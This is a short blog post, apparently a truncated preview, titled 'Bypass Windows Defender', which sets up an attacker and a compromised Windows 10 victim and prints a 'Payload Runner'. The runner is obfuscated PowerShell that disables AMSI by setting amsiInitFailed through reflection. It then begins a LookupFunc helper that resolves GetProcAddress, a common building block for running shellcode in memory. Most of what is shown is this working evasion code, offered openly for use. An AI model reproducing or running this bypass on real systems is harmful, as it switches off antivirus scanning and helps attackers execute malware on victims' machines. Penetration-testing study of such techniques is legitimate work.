Bypass Windows Defender

Cristian Cornea
6 min readJul 28, 2022

In this article, we will bypass Windows Defender (the latest version), explaining each step in detail.

Requirements

  • Windows 10 machine (Victim)
  • Low-level privilege account compromised on Victim
  • Linux machine (Attacker)
  • Defender Anti-Virus running & up-to-date at the moment of publishing this article

Payloads Used

  • Payload Runner:
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)function LookupFunc {Param ($moduleName, $functionName)$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$tmp=@()$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null,@($moduleName)), $functionName))}

--

--

Cristian Cornea
Cristian Cornea

Written by Cristian Cornea

🥷🏻Zerotak - Cyber Security & Pentesting 🧑‍🎓CSTCE - Cyber Security Training Centre of Excellence 🦉SectionX.io - Threat Intel🧛🏼BSides Transylvania

Responses (5)